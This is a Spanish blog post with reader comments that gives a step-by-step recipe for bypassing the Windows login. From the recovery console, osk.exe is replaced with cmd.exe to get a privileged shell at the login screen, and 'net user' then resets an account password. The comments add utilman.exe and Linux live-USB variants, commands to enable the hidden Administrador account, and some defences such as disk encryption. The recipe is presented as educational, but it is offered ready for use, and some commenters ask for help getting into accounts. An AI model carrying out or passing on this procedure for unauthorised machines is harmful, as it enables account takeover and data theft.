Como hackear la contraseña del administrador en Windows (Solo con fines educativos)

Imaginad como profesores que un alumno ha cambiado la contraseña de un equipo y toca mantenimiento.

O imaginad alumnos del ciclo SMR que os pide ayuda el vecino, pues este vídeo es solo para eso, como el post de sospedia.net

Tras el disclaimer que estáis aceptando todos al ver este vídeo la receta, para los que le dan al “no me gusta” simplemente por el hecho de que no he cortado el vídeo y podría haber sido de 5 minutos:

Nos agenciamos el CD, ISO o USB para entrar en la consola de reparación de Windows, salimos al símbolo del sistema o interprete de comandos:

c:

cd Windows\System32

rename osk.exe osk.old

copy cmd.exe osk.exe

Ahora reiniciamos normalmente y activamos teclado en pantalla, con lo que tendremos acceso a la consola como “administradores” y con el comando:

net user

Averiguamos los usuarios del sistema, en mi caso necesito cambiar la password del usuario “tecnico“. Pues con este otro comando la establecemos:

net user tecnico * → Enter password: youarepawned

Fácil, fácil …. xD !!!

***Remember to undo:

Saliendo en otro reinicio a la consola de recuperación, y a la linea de comandos:

c:

cd Windows\System32

del osk.exe

rename osk.old osk.exe

El vídeo este:

Espero que sea de gran utilidad xD

20 comments

  • Ivan

    No lo he probado, pero me niego a creer que Windows ejecute el osk como usuario administrador al pulsar sobre el botón en la pantalla de login.

    También me niego a creer que desde el símbolo del sistema que ejecutas desde el DVD de instalación, puedas renombrar ficheros en System32.

    Si estas dos cosas son posibles, Microsoft debe de solucionar esto pero ya.

    • Hahaha
      Pues no te niegues tanto Ivan, probado en un aula del Instituto en Windows 10 1709
      Saludos

    • Ramón

      No solo funciona con osk.exe, sino con utilman.exe (utilidad de accesibilidad). Ni siquiera hace falta el CD de instalación de Windows para entrar en la consola de reparación. Arrancando con un linux Live, montas el disco ntfs y renombras los archivos desde la shell de Linux (aunque si tiene secureboot con TPM, no arrancará Linux, entonces sí que hace falta el CD de Windows)

      Solución respondiendo a Iván: la primera capa de la seguridad informática es proteger el control de acceso físico a tu equipo. Si alguien tiene acceso físico a tu ordenador, de nada sirve tener contraseñas fuertes o permisos en el sistema de archivos, por eso es posible. La solución es cifrra el disco mediante BitLocker o VeraCrypt, desactivar los USB y proteger la BIOS/UEFI para evitar que arranquen desde CD (aunque las BIOS también tienen sus vulnerabilidades)

  • Pingback: Bonus Pack 2018: Recopilación de artículos de sospedia.net – Jose Blanco Vega

  • Pingback: Bonus Pack 2018: Recopilación de artículos de sospedia.net – Clases fp

  • patricia

    buenas noches comp puedo hacer por que mi laptop se bloqueó el usuario y no puedo entrar no me acuerdo la contraseña y no puse info a la hora de crearla esta en Windows 10 necesito ayuda x favor no puedo formatear hay info y programas valiosos

  • tengo un archivo en acces (vacio) y quiero saber la estrucutura de los ficheros.

    pero tiene password que puedo hacer ?

  • mind

    En un capítulo de Mr. Robot de la cuarta temporada utilizan esta técnica. Muy sencilla y que Windows lleva desde hace tiempo arrastrando. En el primero que lo hice fue en un XP

  • reynaldo orellana

    en una oportunidad logre presionar teclado en pantalla y me salio cmd, pero lo reinicie porque tambien se puso a narrar todo, al prenderlo nuevamente ya no me funciona…. debo haber cambiado/confundido los nombres de los archivos osk y cmd

  • Erick

    nome deja renombrar el archivo osk, me dice; “El sistema no tiene acceso al archivo”

  • yo

    para activar el Administrador incluso desde una cuenta normal por cmd

    c:\>windows\System32>net user Administrador /active:yes

    para ocultar
    c:\>windows\System32>net user Administrador /active:no

    • Hola y gracias por tu aportación.
      Pero inmediatamente después establece una contraseña, que este usuario está deshabilitado por defecto.
      No obstante el propósito del articulo es, sin tener acceso a un equipo o mejor dicho a ningún inicio de sesión, solamente a la pantalla de inicio, como quitar la contraseña a cualquier usuario.
      Imagínate que tras meses de no utilizar un equipo, y para cualquier cuenta, no recuerdas la contraseña.
      Salud y fuerza

  • Luis

    Me podrian ayudar, pongo D:\windows\system32>dir osk.exe y me sale “no se encuentra el archivo”. ¿Qué puedo hacer?

    • Qué versión de Windows tienes, si sales a consola puedes averiguarlo con el comando winver, otra cosa es que no puedas salir a consola.
      Por lo que pones ¿Tienes instalado Windows en la unidad D:?
      También por lo que pones, ¿Estas ejecutando todo esto como comando? D:\windows\system32>dir osk.exe (si este es el caso no funciona así)
      O te estas refiriendo que ¿¿una vez estás en la unidad D: y has cambiado a la carpeta D:\windows\system32 realizas el comando dir osk.exe??
      Intenta aportar más información y veremos como ayudarte
      Espero que sea con fines educativos xD
      Saludos

    • Igual no es D: la unidad, igual es C:
      O a lo mejor habrá cambiado con la versión 1909 de Windows 10, haría que localizar otro ejecutable accesible por teclas en la pantalla de inicio, y realizarlo con una live de Linux en lugar de con el DVD/USB de instalación de Windows o la consola de recuperación.
      En la mía todavía está:
      jose@eniak /cygdrive/c/Windows
      $ cd /cygdrive/c/Windows/

      jose@eniak /cygdrive/c/Windows
      $ find -name “osk.exe” 2> /dev/null
      ./servicing/LCU/Package_for_RollupFix~31bf3856ad364e35~amd64~~18362.778.1.9/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/f/osk.exe
      ./servicing/LCU/Package_for_RollupFix~31bf3856ad364e35~amd64~~18362.778.1.9/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/r/osk.exe
      ./servicing/LCU/Package_for_RollupFix~31bf3856ad364e35~amd64~~18362.815.1.12/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/f/osk.exe
      ./servicing/LCU/Package_for_RollupFix~31bf3856ad364e35~amd64~~18362.815.1.12/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/r/osk.exe
      ./servicing/LCU/Package_for_RollupFix~31bf3856ad364e35~amd64~~18362.836.1.6/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/f/osk.exe
      ./servicing/LCU/Package_for_RollupFix~31bf3856ad364e35~amd64~~18362.836.1.6/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/r/osk.exe
      ./System32/osk.exe
      ./WinSxS/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/f/osk.exe
      ./WinSxS/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/osk.exe
      ./WinSxS/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/r/osk.exe

      Saludos

  • Valeria

    Hola, quisiera saber si hay una manera de recuperar la clave de un usuario invitado, desde otro usuario invitado, debido a que está asociado a un viejo correo Hotmail y necesito tener acceso a el.
    Gracias 🙂

  • Penélope

    Increíble aportación José Blanco, sigue así. Ninguna de tus soluciones es efectiva háztelo mirar. Después de acceder a símbolo de sistema pide la contraseña del admin, estoy decepcionado. Por cierto, bonita foto de perfil, me recuerda a cuando estuve en Bucarest con mi tortuga. Saludos cálidos.

Leave a Reply to reynaldo orellana Cancel reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.